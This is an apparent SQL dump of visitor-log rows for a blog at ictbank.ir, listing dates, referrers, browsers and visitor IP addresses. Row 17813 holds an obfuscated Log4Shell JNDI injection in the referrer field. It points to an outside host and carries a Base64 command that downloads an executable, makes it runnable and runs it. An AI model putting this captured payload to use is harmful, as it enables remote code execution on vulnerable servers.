(17637,'2021-12-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.95.193','000',0,1,0),
(17638,'2021-12-23','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','6.3',NULL,NULL,'','188.163.73.203','000',0,3,0),
(17639,'2021-12-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.185','000',0,1,0),
(17640,'2021-12-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17641,'2021-12-23','https://www.google.com','Chrome','Windows','10.0',NULL,NULL,'','167.114.100.160','000',0,39,0),
(17642,'2021-12-23','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(17643,'2021-12-23','http://design-arena.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.24.54.73','000',0,1,0),
(17644,'2021-12-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','2.57.121.40','000',0,2,0),
(17645,'2021-12-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(17646,'2021-12-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','164.90.206.15','000',0,1,0),
(17647,'2021-12-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(17648,'2021-12-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(17649,'2021-12-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17650,'2021-12-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.191','000',0,2,0),
(17651,'2021-12-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.251','000',0,1,0),
(17652,'2021-12-23','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.231.57.250','000',0,1,0),
(17653,'2021-12-23','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.162.130','000',0,1,0),
(17654,'2021-12-23','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(17655,'2021-12-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,12,0),
(17656,'2021-12-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(17657,'2021-12-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(17658,'2021-12-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.95.147.17','000',0,2,0),
(17659,'2021-12-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','24.63.131.227','000',0,2,0),
(17660,'2021-12-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(17661,'2021-12-24','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','77.222.122.251','000',0,2,0),
(17662,'2021-12-24','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.58.206.206','000',0,7,0),
(17663,'2021-12-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.239.193.124','000',0,1,0),
(17664,'2021-12-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','36.92.112.102','000',0,1,0),
(17665,'2021-12-24','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','35.84.22.179','000',0,2,0),
(17666,'2021-12-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.177.232','000',0,2,0),
(17667,'2021-12-24','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','35.81.169.58','000',0,1,0),
(17668,'2021-12-24','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','5.236.136.179','000',0,1,0),
(17669,'2021-12-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.36.26.83','000',0,1,0),
(17670,'2021-12-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(17671,'2021-12-24','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','176.9.8.180','000',0,9,0),
(17672,'2021-12-24','http://admin.ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.122','000',0,6,0),
(17673,'2021-12-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,2,0),
(17674,'2021-12-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(17675,'2021-12-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(17676,'2021-12-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.207.84','000',0,2,0),
(17677,'2021-12-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.2.22','000',0,1,0),
(17678,'2021-12-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(17679,'2021-12-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,8,0),
(17680,'2021-12-25','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.83.131.114','000',0,5,0),
(17681,'2021-12-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.208.236.28','000',0,2,0),
(17682,'2021-12-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(17683,'2021-12-25','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','2.57.88.218','000',0,1,0),
(17684,'2021-12-25','http://82.102.9.14:80/blog','Samsung Internet','Android','6.0.1',NULL,NULL,'','199.230.122.120','000',0,1,0),
(17685,'2021-12-25','http://82.102.9.14/blog/','Samsung Internet','Android','6.0.1',NULL,NULL,'','82.69.35.12','000',0,1,0),
(17686,'2021-12-25','https://webtechsurvey.com/website/ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.229.104.2','000',0,3,0),
(17687,'2021-12-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','77.74.177.119','000',0,1,0),
(17688,'2021-12-25','http://design-arena.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','194.110.169.90','000',0,2,0),
(17689,'2021-12-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(17690,'2021-12-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17691,'2021-12-25','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','167.99.127.252','000',0,1,0),
(17692,'2021-12-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.68.50.138','000',0,9,0),
(17693,'2021-12-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.7.201','000',0,2,0),
(17694,'2021-12-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.110.166.112','000',0,1,0),
(17695,'2021-12-25','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','142.93.38.212','000',0,3,0),
(17696,'2021-12-25','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','44.201.228.75','000',0,2,0),
(17697,'2021-12-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(17698,'2021-12-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','107.191.47.0','000',0,1,0),
(17699,'2021-12-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,2,0),
(17700,'2021-12-25','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','80.191.235.159','000',0,1,0),
(17701,'2021-12-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(17702,'2021-12-25','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','65.108.59.211','000',0,1,0),
(17703,'2021-12-25','http://ictbank.ir/blog','Chrome','Android','11',NULL,NULL,'','173.252.127.6','000',0,1,0),
(17704,'2021-12-25','http://ictbank.ir/blog','Chrome','Android','11',NULL,NULL,'','173.252.127.3','000',0,1,0),
(17705,'2021-12-25','http://mail.ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.122','000',0,6,0),
(17706,'2021-12-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.216.33','000',0,1,0),
(17707,'2021-12-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,2,0),
(17708,'2021-12-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.127.231','000',0,1,0),
(17709,'2021-12-26','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','178.252.191.34','000',0,1,0),
(17710,'2021-12-26','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','69.165.166.118','000',0,1,0),
(17711,'2021-12-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.156.30','000',0,9,0),
(17712,'2021-12-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.62.177.73','000',0,1,0),
(17713,'2021-12-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,6,0),
(17714,'2021-12-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.190.49.59','000',0,2,0),
(17715,'2021-12-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.110.186','000',0,1,0),
(17716,'2021-12-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(17717,'2021-12-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(17718,'2021-12-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,2,0),
(17719,'2021-12-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.68.110','000',0,2,0),
(17720,'2021-12-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.88.250.34','000',0,2,0),
(17721,'2021-12-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.186.142.66','000',0,4,0),
(17722,'2021-12-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.36.169.106','000',0,1,0),
(17723,'2021-12-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.12.109','000',0,1,0),
(17724,'2021-12-27','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','103.27.54.222','000',0,1,0),
(17725,'2021-12-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17726,'2021-12-27','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','151.234.139.205','000',0,6,0),
(17727,'2021-12-27','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','196.19.159.92','000',0,2,0),
(17728,'2021-12-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.127.56.236','000',0,1,0),
(17729,'2021-12-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','217.219.199.50','000',0,1,0),
(17730,'2021-12-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,11,0),
(17731,'2021-12-27','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','172.27.240.11','000',0,1,0),
(17732,'2021-12-27','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','181.214.206.161','000',0,2,0),
(17733,'2021-12-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,2,0),
(17734,'2021-12-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,2,0),
(17735,'2021-12-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','92.255.85.15','000',0,1,0),
(17736,'2021-12-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.161.78.128','000',0,2,0),
(17737,'2021-12-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.87.144.184','000',0,1,0),
(17738,'2021-12-27','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.236.179.207','000',0,3,0),
(17739,'2021-12-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.253.176.92','000',0,2,0),
(17740,'2021-12-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.35.235.96','000',0,1,0),
(17741,'2021-12-28','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,2,0),
(17742,'2021-12-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.204.46','000',0,2,0),
(17743,'2021-12-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,4,0),
(17744,'2021-12-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(17745,'2021-12-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','159.65.142.178','000',0,1,0),
(17746,'2021-12-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.186.142.66','000',0,2,0),
(17747,'2021-12-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.86.89.163','000',0,1,0),
(17748,'2021-12-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.36.231','000',0,1,0),
(17749,'2021-12-28','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.51.222','000',0,1,0),
(17750,'2021-12-28','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','103.114.158.1','000',0,1,0),
(17751,'2021-12-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(17752,'2021-12-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.60.133','000',0,1,0),
(17753,'2021-12-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(17754,'2021-12-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(17755,'2021-12-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.213.49','000',0,2,0),
(17756,'2021-12-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.129.56.200','000',0,1,0),
(17757,'2021-12-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(17758,'2021-12-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,10,0),
(17759,'2021-12-29','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(17760,'2021-12-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','108.167.189.49','000',0,1,0),
(17761,'2021-12-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,2,0),
(17762,'2021-12-29','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','160.116.22.20','000',0,2,0),
(17763,'2021-12-29','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.80.53.167','000',0,2,0),
(17764,'2021-12-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','54.196.37.220','000',0,2,0),
(17765,'2021-12-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.88.247.244','000',0,1,0),
(17766,'2021-12-29','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','193.142.146.230','000',0,2,0),
(17767,'2021-12-29','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','148.153.51.254','000',0,2,0),
(17768,'2021-12-29','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.15.225.180','000',0,6,0),
(17769,'2021-12-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.203.204','000',0,2,0),
(17770,'2021-12-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(17771,'2021-12-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.50.185','000',0,1,0),
(17772,'2021-12-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(17773,'2021-12-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17774,'2021-12-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.249.133.142','000',0,2,0),
(17775,'2021-12-30','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','138.201.60.47','000',0,1,0),
(17776,'2021-12-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,9,0),
(17777,'2021-12-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.114','000',0,2,0),
(17778,'2021-12-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,2,0),
(17779,'2021-12-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','161.35.213.143','000',0,2,0),
(17780,'2021-12-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.139','000',0,2,0),
(17781,'2021-12-30','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','81.12.89.218','000',0,1,0),
(17782,'2021-12-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(17783,'2021-12-30','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','5.236.185.60','000',0,2,0),
(17784,'2021-12-30','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','5.236.184.58','000',0,3,0),
(17785,'2021-12-30','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.91','000',0,1,0),
(17786,'2021-12-30','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.71','000',0,1,0),
(17787,'2021-12-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(17788,'2021-12-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.204.95','000',0,1,0),
(17789,'2021-12-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.253.177','000',0,1,0),
(17790,'2021-12-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.122.98.218','000',0,3,0),
(17791,'2021-12-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.236.147.154','000',0,4,0),
(17792,'2021-12-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.50.185','000',0,2,0),
(17793,'2021-12-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17794,'2021-12-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17795,'2021-12-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(17796,'2021-12-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.42','000',0,2,0),
(17797,'2021-12-31','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.54.160.149','000',0,11,0),
(17798,'2021-12-31','http://ictbank.ir/blog','Chrome','Android','11',NULL,NULL,'','172.27.244.56','000',0,2,0),
(17799,'2021-12-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(17800,'2021-12-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(17801,'2021-12-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(17802,'2021-12-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.23.247.139','000',0,2,0),
(17803,'2021-12-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','2.146.4.4','000',0,1,0),
(17804,'2021-12-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.190.225','000',0,1,0),
(17805,'2021-12-31','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','20.127.138.89','000',0,2,0),
(17806,'2021-12-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(17807,'2021-12-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(17808,'2021-12-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(17809,'2021-12-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(17810,'2021-12-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(17811,'2021-12-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','171.97.85.195','000',0,1,0),
(17812,'2021-12-31','http://ictbank.ir/blog','Chrome','OS X','10.8.0',NULL,NULL,'','194.110.115.22','000',0,2,0),
(17813,'2021-12-31','t(\\\\\\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}\\\\\\\')','Unknown','Unknown','Unknown',NULL,NULL,'','199.127.60.104','000',0,1,0),
(17814,'2021-12-31','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.167','000',0,1,0),
(17815,'2021-12-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.8','000',0,2,0),
(17816,'2021-12-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,2,0),
(17817,'2022-01-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','13.89.0.244','000',0,1,0),
(17818,'2022-01-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.51.49','000',0,2,0),
(17819,'2022-01-01','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','205.185.116.89','000',0,2,0),
(17820,'2022-01-01','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.41.193','000',0,1,0),
(17821,'2022-01-01','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.42.155','000',0,1,0),
(17822,'2022-01-01','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','205.185.122.184','000',0,1,0),
(17823,'2022-01-01','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.36.112','000',0,1,0),
(17824,'2022-01-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.129.56.200','000',0,1,0),
(17825,'2022-01-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.90','000',0,2,0),
(17826,'2022-01-01','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','15.206.235.52','000',0,1,0),
(17827,'2022-01-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.173.98','000',0,1,0),
(17828,'2022-01-01','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.117','000',0,1,0),
(17829,'2022-01-01','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','31.59.140.69','000',0,1,0),
(17830,'2022-01-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.46','000',0,1,0),
(17831,'2022-01-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(17832,'2022-01-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','192.53.168.183','000',0,1,0),
(17833,'2022-01-01','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.112','000',0,1,0),
(17834,'2022-01-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.18.55','000',0,1,0),
(17835,'2022-01-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,7,0),
(17836,'2022-01-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(17837,'2022-01-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.60.133','000',0,1,0),
(17838,'2022-01-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(17839,'2022-01-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(17840,'2022-01-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,2,0),
(17841,'2022-01-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,2,0),
(17842,'2022-01-01','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.66.212','000',0,1,0),
(17843,'2022-01-01','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.19.64','000',0,1,0),
(17844,'2022-01-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(17845,'2022-01-02','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.226.125.234','000',0,1,0),
(17846,'2022-01-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(17847,'2022-01-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','135.181.69.19','000',0,1,0),
(17848,'2022-01-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,7,0),
(17849,'2022-01-02','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.127.249.47','000',0,8,0),
(17850,'2022-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.38.187.83','000',0,1,0),
(17851,'2022-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.206.116','000',0,1,0),
(17852,'2022-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.43.95.173','000',0,3,0),
(17853,'2022-01-02','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','152.32.155.113','000',0,3,0),
(17854,'2022-01-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.213.53','000',0,1,0),
(17855,'2022-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','135.181.78.101','000',0,1,0),
(17856,'2022-01-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.213.57','000',0,1,0),
(17857,'2022-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.36.59.13','000',0,16,0),
(17858,'2022-01-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','107.191.47.0','000',0,1,0),
(17859,'2022-01-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(17860,'2022-01-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,2,0),
